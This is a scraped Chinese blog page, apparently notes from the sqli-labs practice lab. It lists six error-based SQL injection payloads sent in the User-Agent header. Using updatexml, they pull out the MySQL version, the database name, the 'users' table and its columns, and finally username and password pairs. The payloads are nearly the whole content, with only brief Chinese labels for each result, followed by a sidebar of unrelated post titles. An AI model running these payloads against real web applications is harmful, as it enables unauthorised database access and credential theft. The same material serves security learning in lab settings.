zoukankan      html  css  js  c++  java
  • sqli

    User-Agent:' or updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1) , 1, 1) #  #版本

    User-Agent:' or updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) , 1, 1) #  #数据库security

    User-Agent:' or updatexml(1,concat(0x7e,(SELECT table_name from information_schema.tables where table_schema=database() limit 3,1),0x7e),1) , 1, 1) #  #数据表users

    User-Agent:' or updatexml(1,concat(0x7e,(SELECT column_name from information_schema.columns where table_name='users' limit 4,1),0x7e),1) , 1, 1) #  #password

    User-Agent:' or updatexml(1,concat(0x7e,(SELECT column_name from information_schema.columns where table_name='users' limit 7,1),0x7e),1) , 1, 1) #  #username

    User-Agent:' or updatexml(1,concat(0x7e,(SELECT concat(username,'|',password) from users limit 0,1),0x7e),1) , 1, 1) #

  • 相关阅读:
    LINUX
    DOCKER
    计算牛的数目
    计算a^3=b^3+c^3+d^3
    用递归计算C(m,n)
    A Mathematical Curiosity
    Who is lier?
    我的第一篇 实习报告
    R.java
    天气系统
  • 原文地址:https://www.cnblogs.com/llcn/p/12745768.html
Copyright © 2011-2022 走看看